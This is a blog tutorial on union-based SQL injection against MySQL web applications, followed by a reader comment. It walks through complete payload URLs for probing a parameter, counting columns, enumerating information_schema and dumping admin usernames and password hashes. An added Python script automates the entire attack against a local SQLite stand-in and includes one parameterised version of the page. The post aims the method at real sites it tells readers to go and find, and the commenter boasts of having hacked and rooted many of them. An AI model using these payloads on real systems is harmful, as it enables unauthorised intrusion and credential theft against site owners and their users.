SQL Injection Tutorial

There are many types of SQL injection, but in this tutorial I will explain how to use a union-based injection against a MySQL backend to extract the tables and columns that hold useful data, such as user IDs, usernames, emails and admin passwords.

How To Find A Vulnerable Site?

There are many ways to find vulnerable web sites: looking for the vulnerability manually or using a web scanner. For more, refer to my post on How to Find Vulnerable Sites.

Exploiting The Vulnerability

Now say we have found a site that looks vulnerable. Add a single quote ( ' ) to the end of the URL; if the page comes back with a
database error message, the parameter is being pasted into the SQL query unescaped and the site is vulnerable:

www.vulnerablesite.net/articles.php?id=1'

(A page that hides the error can still be injectable, but that blind case is outside this tutorial.)

Now we need to find the number of columns returned by the query behind the page.
For this we use the "order by" clause: add order by 1--
to the end of the URL and increase the number until we get an error message. (In MySQL the -- comment must be followed by a space, so in the browser end the URL with -- - or --+ rather than a bare --.)

www.vulnerablesite.net/articles.php?id=1 order by 1--

www.vulnerablesite.net/articles.php?id=1 order by 2--

www.vulnerablesite.net/articles.php?id=1 order by 3--

www.vulnerablesite.net/articles.php?id=1 order by 4--

www.vulnerablesite.net/articles.php?id=1 order by 5--

And so on until we get an error message.

Say we get an error message (MySQL reports "Unknown column '5' in 'order clause'") when we enter order by 5--.
Then the query returns 4 columns. Note that this is the column count of the query behind the page, not of the whole database; it is the number we need for the union in the next step.

Now we use the "union all select" statement to find which column the page actually displays (the "vulnerable" column).
Add union all select followed by as many numbers as the columns we found in the last step:

www.vulnerablesite.net/articles.php?id=1 union all select 1,2,3,4--

Now some of the numbers should show up on the page. If the real article crowds out the injected row, use an id that does not exist (id=-1) so that only our row is rendered.
Say we see the number 3: then column 3 is displayed, and whatever we select into that position will be shown on the page.

We can now find the database version, name and user by replacing the vulnerable column number with one of the following expressions:
user(), database(), version(), @@version
First we find the MySQL version by putting @@version in place of the vulnerable column:

www.vulnerablesite.net/articles.php?id=1 union all select 1,2,@@version,4--

The MySQL version now appears where the number showed in the previous step. If it is 5 or above, continue reading: the information_schema database we use next exists from MySQL 5.0. If it is 4 or below, you have to guess or brute-force the table and column names.

Now we need to find the table names in the database. For this we select table_name from information_schema.tables, again in the vulnerable column:

www.vulnerablesite.net/articles.php?id=1 union all select 1,2,table_name,4 from information_schema.tables--

Remember that table_name goes in the vulnerable column number you found earlier. If the command is entered correctly the page shows a table name; since the page usually renders only one row, wrap it in group_concat() (as in the next step) to see them all at once. Without a filter the list also includes MySQL's own tables from information_schema and mysql, so look for the ones belonging to the site, such as admin, member or user tables.

Now we find the column names. For this we use group_concat(column_name), which joins every matching row into one comma-separated string so the page displays them all at once:

www.vulnerablesite.net/articles.php?id=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns--

As written this lists the columns of every table in a single string (and group_concat truncates at group_concat_max_len, 1024 characters by default), so restrict it to the table you are interested in. Look for interesting names such as username, id, email and password.

Finally we dump the data from the columns of the table we are interested in, again with group_concat.
Say we want the user_id, username and password fields from the table admin. 0x3a is the hex encoding of ':' and only serves to separate the fields:

www.vulnerablesite.net/articles.php?id=1 union all select 1,2,group_concat(user_id,0x3a,username,0x3a,password),4 from admin--

If the command is successful the page shows the user id, user name and password of every row, separated by commas.

Example:-

1 : admin : pass
2 : user : password
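Here is the whole procedure above (column count, reflected column, version, tables, columns, dump) as an added, runnable Python example; it is not code from this post. It uses an in-memory SQLite database with constructed sample rows as a stand-in for the target's MySQL backend, models articles.php as a function that pastes the id into its query and renders columns 2 and 3, and shows a parameterised version of the same page that the payloads no longer work against. The table and column names, the sample hashes and the page layout are all assumptions; where SQLite's syntax differs from the MySQL used in the tutorial, the MySQL form is given in a comment.

```python
import re
import sqlite3

# Constructed sample data standing in for the target's MySQL backend. SQLite is used
# so the example runs offline; where SQLite differs from MySQL the MySQL form the
# tutorial uses is given in a comment.
ARTICLES = [(1, "Welcome", "First post", "editor"),
            (2, "News", "Second post", "editor")]
ADMIN = [(1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),   # constructed: md5("password")
         (2, "user", "098f6bcd4621d373cade4e832627b4f6")]    # constructed: md5("test")


def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles(id INTEGER, title TEXT, body TEXT, author TEXT)")
    db.execute("CREATE TABLE admin(user_id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO articles VALUES (?,?,?,?)", ARTICLES)
    db.executemany("INSERT INTO admin VALUES (?,?,?)", ADMIN)
    return db


def vulnerable_page(db, id_param):
    """Models articles.php?id=...: the parameter is pasted into the SQL string
    (the bug the tutorial exploits) and only columns 2 and 3 are rendered."""
    sql = "SELECT id, title, body, author FROM articles WHERE id=" + id_param
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "Error: " + str(exc)      # the error message the tutorial looks for
    return "".join(f"<h1>{r[1]}</h1><p>{r[2]}</p>" for r in rows)


def safe_page(db, id_param):
    """Hardened version: the id travels as a bound parameter, never as SQL text,
    so every payload below simply fails to match a row."""
    rows = db.execute("SELECT id, title, body, author FROM articles WHERE id=?",
                      (id_param,)).fetchall()
    return "".join(f"<h1>{r[1]}</h1><p>{r[2]}</p>" for r in rows)


def rendered_cells(html):
    """Text of every rendered cell, in page order."""
    return re.findall(r">([^<]+)<", html)


def count_columns(page, max_cols=20):
    """Step 1: ORDER BY n succeeds while n <= column count and errors beyond it."""
    for n in range(1, max_cols + 1):
        if page(f"1 order by {n}--").startswith("Error"):
            return n - 1
    return None


def reflected_columns(page, ncols):
    """Step 2: union in a row of marker numbers; the markers that appear on the
    page are the column positions it renders. id=-1 suppresses the real row."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    html = page(f"-1 union all select {markers}--")
    return sorted(int(t) for t in rendered_cells(html) if t.isdigit())


def extract(page, ncols, column, expression, from_clause=""):
    """Steps 3-6: select an expression into the reflected column and read it back."""
    cells = [str(i) for i in range(1, ncols + 1)]
    cells[column - 1] = expression
    html = page(f"-1 union all select {','.join(cells)}{from_clause}--")
    # the injected value is the rendered cell that is not one of our markers
    return next((t for t in rendered_cells(html) if t not in cells), None)


def run_attack(page):
    """The whole tutorial against one page function; returns what was learned."""
    ncols = count_columns(page)
    col = reflected_columns(page, ncols)[0]
    return {
        "columns": ncols,
        "reflected": col,
        # MySQL: @@version
        "version": extract(page, ncols, col, "sqlite_version()"),
        # MySQL: group_concat(table_name) from information_schema.tables
        #        where table_schema=database()
        "tables": extract(page, ncols, col, "group_concat(name)",
                          " from sqlite_master where type='table'"),
        # MySQL: group_concat(column_name) from information_schema.columns
        #        where table_name='admin'
        "admin_columns": extract(page, ncols, col, "group_concat(name)",
                                 " from pragma_table_info('admin')"),
        # MySQL: group_concat(user_id,0x3a,username,0x3a,password) from admin
        "dump": extract(page, ncols, col,
                        "group_concat(user_id||':'||username||':'||password)",
                        " from admin"),
    }


if __name__ == "__main__":
    db = build_db()
    for key, value in run_attack(lambda p: vulnerable_page(db, p)).items():
        print(f"{key}: {value}")
```

Run it with python3 and it prints what each step learned, ending with the dump 1:admin:...,2:user:... in the same id:username:password layout as the example output above. Two things it makes explicit that the URLs in the tutorial gloss over: an id that matches no real row (id=-1), so the page renders only the injected row, and a where clause on the information_schema queries (table_schema=database(), table_name='admin'), so the lists are limited to the site's own tables rather than everything on the server. Feeding the same payloads to safe_page returns an empty page every time, which is the whole difference a bound parameter makes.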

Most of the time the passwords are stored hashed; to crack them, refer to my posts on Hashes and Salts.

Hope you enjoyed this tutorial. If you have any doubts, feel free to comment.

Unknown said on August 26, 2012 at 4:27 AM:

Hey bro, all your posts on SQLi are very nice! Good work! Actually I have already hacked so many sites with these methods, and I am also rooting some of them ;)
The reason I surf your website is to find some advanced topics on SQLi, like:
1- POST SQLi tutorial
2- cookie-based SQLi.
Because I am messing with these... Also some other topics like:
1- Some MD5 hashes are not cracked online; tools take so much time to crack.
2- The common but very irritating admin page finding :/ Havij, Perl scripts and online sites fail to find the admin page of some sites, then what to do...! Please reply, and yeah, make a tutorial on POST SQLi and cookie SQLi..! :p


